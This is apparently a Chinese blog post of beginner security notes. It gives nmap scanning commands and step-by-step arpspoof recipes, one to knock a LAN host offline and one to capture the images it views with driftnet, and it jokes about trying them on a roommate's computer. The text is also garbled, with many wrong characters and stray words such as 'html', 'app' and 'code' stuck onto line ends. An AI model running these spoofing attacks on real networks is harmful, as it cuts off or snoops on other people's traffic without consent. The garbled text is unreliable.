文中可能存在错误操做或错误理解,望你们不吝指正. 同时也但愿能够帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.
!阅前须知!
本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记.
本文中的工具可能已通过时,或使用方法已经改变了,感兴趣能够深刻查阅资料
(可是我仍是列出之前的使用方法供你们借鉴).html
ps.若对无线攻击手段与WiFi破解感兴趣能够参考如下两篇文章
【无线安全实践入门】基础攻击手段与经常使用工具简介
【无线安全实践入门】破解WiFi密码的多个方法linux
ps.本文环境在Kali下,学习最好具有一点linux基础知识.
安全
NMap(Network Mapper),一个很不错的网络扫描和嗅探工具包网络
--NMap真的很经常使用,简直神器 --列出几种简单的使用方法: --ping扫描,快速,不过回显的内容有限 > nmap -sP (网关IP)/(子网掩码) --SYN/半开放扫描,加上-A回显详细信息 > nmap -sS [-A] (网关IP)/(子网掩码) --单个扫描,显示详细内容 > nmap -A (目标IP) --示例 > nmap -sP 192.168.1.1/24
局域网中的ARP欺骗仍是比较有意思的.像arpspoof、Ettercap等工具都很不错.
arp欺骗以后其实能够不少动做的...
这里就介绍老掉牙的arpspoof的断网攻击和图片捕获.app
ps.有条件的话,能够拿手机或者室友电脑练手(doge脸).工具
--首先,在局域网环境中配合NMap工具使用,取得目标IP > nmap -sP (网关IP)/(子网掩码)
2.1.断网攻击学习
ps.修改ip_forward的值,是为了开启IP转发,其值为'0'时候则禁止转发,目标主机断网.测试
--修改ip_forward(默认为'0') --能够提早cat查看一下,如果回显'0',则能够跳过本步 > echo 0 > /proc/sys/net/ipv4/ip_forward --开始arp欺骗 > arpspoof -i (你的网卡名称) -t (目标IP) (网关IP) --使用目标主机上网测试,观察命令行回显.
2.2.图片捕获命令行
--修改ip_forward(默认为'0') --能够提早cat查看一下,如果回显'1',则能够跳过本步 > echo 1 > /proc/sys/net/ipv4/ip_forward --开始arp欺骗(本机网卡名,能够用ifconfig来查看) > arpspoof -i (本机网卡名) -t (目标IP) (网关IP) --另外再开一终端,开始抓取图片 > drifnet -i (本机网卡名) --使用目标主机上网看图片,观察弹出的窗口回显图片,观察命令行回显.
常见的网络协议是网络安全中的基础,能让你可以更快吸取了解技术细节.code
加油,共勉